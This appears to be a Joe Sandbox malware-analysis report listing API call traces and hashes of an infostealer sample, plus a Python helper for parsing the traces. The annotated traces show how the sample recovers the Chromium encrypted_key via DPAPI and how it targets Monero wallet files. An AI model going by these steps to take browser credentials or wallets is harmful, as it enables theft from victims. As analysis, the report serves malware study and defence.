                      • API ID: lstrcpy
                      • String ID: st$st$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 3722407311-2923598100
                      • Opcode ID: c205cf95b49d10dcae63f492ed732aad298b4a0237e5fa80457cc76b9f6e1d00
                      • Instruction ID: eb6f80080464c2ef0ba32312b52f38013e099b57e156abc51fda0b0d68269dcb
                      • Opcode Fuzzy Hash: c205cf95b49d10dcae63f492ed732aad298b4a0237e5fa80457cc76b9f6e1d00
                      • Instruction Fuzzy Hash: A25141B1D44218EFDB28EBA0DD85BEEB374EF54304F1041A8E61576182EB786E88CF55
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: same 14 associated dumps as listed above (identical for every function record in this snapshot)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: e96bcdabc874b972e76eaf7bf003d8672e0f6237b6183c57a0a8412b21e3eb18
                      • Instruction ID: b6d290a500f6d7bf75e6ebe8e6f9884d9887590922b057361d7d7d1085957759
                      • Opcode Fuzzy Hash: e96bcdabc874b972e76eaf7bf003d8672e0f6237b6183c57a0a8412b21e3eb18
                      • Instruction Fuzzy Hash: FF4130B1D54109EFDB04EFA4D849AEEB778AF54304F108018F51A76291DB79AA09CFA2
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC [GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING: read-only open of an existing file]
                        • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                        • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31 [0x40 = LPTR, fixed zero-initialised block sized from GetFileSizeEx]
                        • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,0073148F,00000000), ref: 00739A5A
                        • Part of subcall function 007399C0: LocalFree.KERNEL32(0073148F), ref: 00739A90
                        • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                        • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00739D39 [substring search for the os_crypt.encrypted_key value of a Chromium "Local State" file in the buffer read above]
                        • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF [dwFlags 1 = CRYPT_STRING_BASE64; this first call with a NULL output buffer only sizes the result]
                        • Part of subcall function 00739AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
                        • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A [second call decodes the base64 into the buffer just allocated]
                        • Part of subcall function 00739AC0: LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F
                        • Part of subcall function 00739B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00739B84 [dwFlags 0; unwraps the decoded blob with the current user's DPAPI master key, so it only works in the victim's own session]
                        • Part of subcall function 00739B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00739BA3
                        • Part of subcall function 00739B60: LocalFree.KERNEL32(?), ref: 00739BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: same 14 associated dumps as listed above (identical for every function record in this snapshot)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 5ea0464b655f5ca0832f84294452d83243a50364d4d5ae642cd4453acc5424c2
                      • Instruction ID: b4b0572ac06c818cf5aba37b75c22fbe16f3e59a88d270e30d9176bbde29a5df
                      • Opcode Fuzzy Hash: 5ea0464b655f5ca0832f84294452d83243a50364d4d5ae642cd4453acc5424c2
                      • Instruction Fuzzy Hash: 833156B5E10109EBDF04DFE4DC86AEF77B8BF44304F544518EA05A7242E7789A04CBA1
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007505B7), ref: 007486CA [dwFlags 0x2 = TH32CS_SNAPPROCESS: snapshot of all processes]
                      • Process32First.KERNEL32(?,00000128), ref: 007486DE [0x128 = 296 = sizeof(PROCESSENTRY32) for the 32-bit ANSI structure, i.e. the dwSize field is set correctly]
                      • Process32Next.KERNEL32(?,00000128), ref: 007486F3
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • CloseHandle.KERNEL32(?), ref: 00748761
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: same 14 associated dumps as listed above (identical for every function record in this snapshot)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 77de83550f1443c2de0551f4c97f40aa3abcb1b2113719c490ac6928d9fedeb8
                      • Instruction ID: 7a392a55d61a1f51e4fa55d999ce01d94882c56aed66a5c23636ae55f810e9b6
                      • Opcode Fuzzy Hash: 77de83550f1443c2de0551f4c97f40aa3abcb1b2113719c490ac6928d9fedeb8
                      • Instruction Fuzzy Hash: F9316D71941218EBDB25DF90CC55FEEB778EB44700F1041A9E50AA21A0DB386E45CFA2
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00750E00,00000000,?), ref: 007479B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 007479B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,00750E00,00000000,?), ref: 007479C4
                      • wsprintfA.USER32 ref: 007479F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: same 14 associated dumps as listed above (identical for every function record in this snapshot)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: c813a343f89b8765742dd021e69429561b312b3a4e951f15df7986a4a10f9198
                      • Instruction ID: a76ec64370861e8c75fd41b769a078a56456670ccc8e41071564d93a72b8b2c3
                      • Opcode Fuzzy Hash: c813a343f89b8765742dd021e69429561b312b3a4e951f15df7986a4a10f9198
                      • Instruction Fuzzy Hash: 981127B2918118ABCB14DFC9DD45BBEB7F8FB8CB11F14425AF605A2280E3395940DBB1
                      APIs
                      • __getptd.LIBCMT ref: 0074C74E
                        • Part of subcall function 0074BF9F: __amsg_exit.LIBCMT ref: 0074BFAF
                      • __getptd.LIBCMT ref: 0074C765
                      • __amsg_exit.LIBCMT ref: 0074C773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0074C797
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: same 14 associated dumps as listed above (identical for every function record in this snapshot)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: 407a073867b3a4352e56e401377e729a3868f0b885797632333c8c4dd7655cfd
                      • Instruction ID: 95ee45351b3f708b2ed6e501a5ef87643de55e561808f9a5eb94821ba3b3d0a5
                      • Opcode Fuzzy Hash: 407a073867b3a4352e56e401377e729a3868f0b885797632333c8c4dd7655cfd
                      • Instruction Fuzzy Hash: 36F0B432942700EBD7A3BBB8580B79D33A06F00721F248149F404A61D2DB6C9D449E5A
                      APIs
                        • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00744F7A
                      • lstrcat.KERNEL32(?,00751070), ref: 00744F97
                      • lstrcat.KERNEL32(?,013E8AE0), ref: 00744FAB
                      • lstrcat.KERNEL32(?,00751074), ref: 00744FBD
                        • Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
                        • Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943
                        • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
                        • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
                        • Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
                        • Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92
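The API list above is the static call trace of a directory walk: a root folder is obtained with SHGetFolderPathA (the second argument, 0000001C, is CSIDL_LOCAL_APPDATA in shlobj.h), path pieces are appended with lstrcat, and subcall 00744910 builds a search pattern with wsprintfA and then iterates with FindFirstFileA / FindNextFileA / FindClose, comparing each entry name against two unresolved string constants (00750FDC, 00750FE0) with StrCmpCA. The following helper is an added example for triaging such blocks; it is not part of Joe Sandbox or of the sample. The input is the list above copied verbatim into SAMPLE, the CSIDL table is a subset of Microsoft's shlobj.h values, and the parser's assumptions (one call per bullet line, addresses as 8 hex digits, trace columns possibly showing more stack slots than the API declares) are noted in the comments. The report does not resolve what 00750FDC and 00750FE0 point to; a dot / dot-dot skip is the usual reason for two string compares between FindFirstFileA and FindNextFileA, but that is an assumption here, so the helper only reports the constants.

```python
"""Parse Joe Sandbox 'APIs' bullet lines and summarise the file-enumeration
pattern they reveal. Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import Optional

# Subset of CSIDL values from Microsoft's shlobj.h, enough for this sample.
CSIDL = {
    0x05: "CSIDL_PERSONAL",
    0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA",
    0x1C: "CSIDL_LOCAL_APPDATA",
    0x26: "CSIDL_PROGRAM_FILES",
}

# Constructed input: the eleven bullet lines of the report block above.
SAMPLE = """\
  • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
• lstrcat.KERNEL32(?,00000000), ref: 00744F7A
• lstrcat.KERNEL32(?,00751070), ref: 00744F97
• lstrcat.KERNEL32(?,013E8AE0), ref: 00744FAB
• lstrcat.KERNEL32(?,00751074), ref: 00744FBD
  • Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
  • Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943
  • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
  • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
  • Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
  • Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92
"""

# Assumed line shape: "• [Part of subcall function XXXXXXXX: ]Api.MODULE[(args)][,] ref: XXXXXXXX"
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: list          # raw argument tokens; '?' means unresolved at analysis time
    ref: int            # address of the call site
    subcall: Optional[int]  # enclosing subcall function, if the line says so


def parse_api_lines(text: str) -> list:
    """Turn the bullet lines into Call records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


def hexarg(token: str) -> Optional[int]:
    """Resolved 8-hex-digit argument -> int; '?' or anything else -> None."""
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else None


def decode_shgetfolderpath(call: Call) -> Optional[dict]:
    """SHGetFolderPathA(hwnd, csidl, hToken, dwFlags, pszPath): decode the CSIDL.
    The trace may show more stack slots than the five declared parameters (the
    sample shows seven); only index 1 is interpreted here."""
    if call.api != "SHGetFolderPathA" or len(call.args) < 2:
        return None
    csidl = hexarg(call.args[1])
    if csidl is None:
        return None
    # Low byte selects the folder; high byte carries CSIDL_FLAG_* bits (e.g. 0x8000 = CREATE).
    return {"csidl": CSIDL.get(csidl & 0xFF, hex(csidl & 0xFF)), "flags": csidl & 0xFF00}


def find_enumeration_loops(calls: list) -> list:
    """Per subcall, report a FindFirstFileA -> FindNextFileA -> FindClose sequence in
    address order, plus any StrCmp* filters sitting inside the loop body."""
    by_sub = {}
    for c in calls:
        by_sub.setdefault(c.subcall, []).append(c)
    loops = []
    for sub, seq in by_sub.items():
        seq = sorted(seq, key=lambda c: c.ref)
        first = [c for c in seq if c.api == "FindFirstFileA"]
        nxt = [c for c in seq if c.api == "FindNextFileA"]
        close = [c for c in seq if c.api == "FindClose"]
        if not (first and nxt and close) or not (first[0].ref < nxt[0].ref < close[0].ref):
            continue
        filters = [c for c in seq if c.api.startswith("StrCmp") and first[0].ref < c.ref < nxt[0].ref]
        loops.append({
            "subcall": sub,
            "first": first[0].ref, "next": nxt[0].ref, "close": close[0].ref,
            "body_span": nxt[0].ref - first[0].ref,   # bytes between FindFirst and FindNext call sites
            "filter_strings": [c.args[1] for c in filters if len(c.args) > 1],
        })
    return loops


def summarize(text: str) -> dict:
    calls = parse_api_lines(text)
    root = next((d for d in map(decode_shgetfolderpath, calls) if d), None)
    return {
        "root": root,
        "lstrcat_calls": sum(1 for c in calls if c.api == "lstrcat"),
        "loops": find_enumeration_loops(calls),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE))
```

Running it on SAMPLE reports the root as CSIDL_LOCAL_APPDATA with no flag bits, four lstrcat appends, and one enumeration loop in subcall 00744910 with two string filters (00750FDC, 00750FE0) between FindFirstFileA and FindNextFileA. The body_span value is only the distance between call sites, a rough size hint for the loop body, not a count of instructions.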
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: 5dc3a9d671331870fe4bdb8b04415ceef0f90f5fa55a67800bd54652b54b1dea
                      • Instruction ID: ea38c41ea9eaebef57b1cd3941709da6343c9cd021d14b8fcbd344a92cd26292
                      • Opcode Fuzzy Hash: 5dc3a9d671331870fe4bdb8b04415ceef0f90f5fa55a67800bd54652b54b1dea
                      • Instruction Fuzzy Hash: 582198B7914208ABD754FBB0DC4AFED337CABD4301F404554B65D92181EEB8AAC89B93